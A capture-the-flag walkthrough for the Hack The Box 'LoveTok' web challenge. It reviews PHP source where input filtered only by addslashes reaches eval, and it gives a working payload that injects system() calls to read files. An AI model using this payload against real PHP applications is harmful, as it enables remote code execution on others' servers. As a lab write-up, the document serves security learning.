LoveTok HTB Walkthrough

This post documents my process for solving the LoveTok box on Hack The Box. The challenge involves analyzing PHP source code, understanding the misuse of addslashes, and exploiting command injection through the eval function.

Description

True love is tough, and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back.

The source code must be downloaded to analyze the website.

Reference:
https://swordandcircuitboard.com/php-addslashes-command-injection-bypass/

Source Code Review

TimeModel.php:

<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->format = addslashes($format);

        [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
        $this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
    }

    public function getTime()
    {
        eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
        return isset($time) ? $time : 'Something went terribly wrong';
    }
}

The key line is:

eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');

The $format is taken from user input and only passed through addslashes, which is not sufficient to prevent code injection.

Exploitation

A bypass technique for addslashes command injection is discussed in this reference article.

You can exploit the vulnerability with a payload like:

${system($_GET[1])}&1=cat+../flagBweet

This payload breaks out of the intended context and executes arbitrary commands, such as reading the flag.

Lessons Learned

Never use addslashes as your only input validation/sanitization. Always use proper validation and context-aware escaping.
PHP’s eval is dangerous when handling user-supplied data, especially if input is not strictly sanitized.
Reviewing source code is a powerful way to discover hidden vulnerabilities and exploitation techniques.
Attackers often look for creative ways to bypass insufficient sanitization using PHP features like variable variables and braces.

Writeup based on my own exploitation process and references from the CTF and web security communities.

Description#

Source Code Review#

Exploitation#

Lessons Learned#

Description

Source Code Review

Exploitation

Lessons Learned